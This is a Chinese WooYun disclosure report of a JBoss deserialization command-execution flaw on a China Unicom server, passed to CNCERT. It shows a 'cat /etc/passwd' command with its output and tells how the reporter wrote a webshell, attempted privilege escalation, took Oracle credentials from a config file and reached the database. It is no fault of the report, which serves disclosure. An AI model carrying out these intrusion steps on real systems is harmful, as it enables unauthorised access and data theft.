当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0164216

漏洞标题:联通某站任意命令执行(getshell并get一数据库)

相关厂商:中国联通

漏洞作者: 路人甲

提交时间:2015-12-24 14:48

修复时间:2016-02-09 23:29

公开时间:2016-02-09 23:29

漏洞类型:命令执行

危害等级:高

自评Rank:15

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-12-24: 细节已通知厂商并且等待厂商处理中
2015-12-28: 厂商已经确认,细节仅向厂商公开
2016-01-07: 细节向核心白帽子及相关领域专家公开
2016-01-17: 细节向普通白帽子公开
2016-01-27: 细节向实习白帽子公开
2016-02-09: 细节向公众公开

简要描述:

凑个反序列化的热闹~

详细说明:

看到那么多人刷我也来一发~
问题出在
**.**.**.**:3380/invoker/JMXInvokerServlet

wy01.png


JBOSS的任意命令执行
cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbinlogin
daemon:x:2:2:daemon:/sbin:/sbinlogin
adm:x:3:4:adm:ar/adm:/sbinlogin
sync:x:5:0:sync:/sbin:/bin/sync
mail:x:8:12:mail:ar/spool/mail:/sbinlogin
ftp:x:14:50:FTP User:ar/ftp:/sbin/nologin
nobody:x:99:99:Nobody:/:/sbinlogin
nscd:x:28:28:NSCD Daemon:/:/sbinlogin
vcsa:x:69:69:virtual console memory owner:/dev:/sbinlogin
ntp:x:38:38::/etc/ntp:/sbinlogin
pcap:x:77:77::ar/arpwatch:/sbinlogin
dbus:x:81:81:System message bus:/:/sbinlogin
avahi:x:70:70:Avahi daemon:/:/sbinlogin
rpc:x:32:32:Portmapper RPC user:/:/sbinlogin
mailnull:x:47:47::ar/spool/mqueue:/sbinlogin
smmsp:x:51:51::ar/spool/mqueue:/sbinlogin
apache:x:48:48:Apache:ar/www:/sbinlogin
sshd:x:74:74:Privilege-separated SSH:ar/empty/sshd:/sbinlogin
rpcuser:x:29:29:RPC Service User:arb/nfs:/sbinlogin
nfsnobody:x:4294967294:4294967294:Anonymous NFS User:arb/nfs:/sbinlogin
xfs:x:43:43:X Font Server:/etc/X11/fs:/sbinlogin
haldaemon:x:68:68:HAL daemon:/:/sbinlogin
avahi-autoipd:x:100:101:avahi-autoipd:arb/avahi-autoipd:/sbinlogin
gdm:x:42:42::ar/gdm:/sbinlogin
sabayon:x:86:86:Sabayon user:/homebayon:/sbinlogin
oracle:x:500:500::/export/home/oracle:/bin/bash
probe:x:501:100::/export/home/probe:/bin/bash
dninms:x:502:100::/export/home/dninms:/bin/bash
admin:x:503:501::/export/home/admin:/bin/bash
cas:x:504:100::/export/home/cas:/bin/bash
zzzxj:x:505:100::/export/home/zzzxj:/bin/bash
原本在当前目录/写shell写进去找不到位置,纠结了一下,之后在配置文件中找到web路径
getshell:

wy01.png


wy1.png


getshell后发现权限不高且目录限制死,利用此版本适用的exp提权没成功,那么换个思路看看配置文件有什么收获,
在inms_app xml配置文件中获得一oracle地址及帐号密码:

wy003.png


看看能不能连上咯~
费劲周折终于用园长大大的JDBCTest连成功,看一下版本和大小:

wy5.png


数据库就点到为止,仅证明连接OK~
另发现一些backup的app,被替换加上后门并且发给不知情人事就不好了吧~

wy6.png


漏洞证明:

wy1.png


wy5.png


wy6.png


修复方案:

你们更专业~

版权声明:转载请注明来源 路人甲@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:10

确认时间:2015-12-28 19:15

厂商回复:

CNVD确认并复现所述情况,已经转由CNCERT向中国联通集团公司通报,由其后续协调网站管理部门处置.

最新状态:

暂无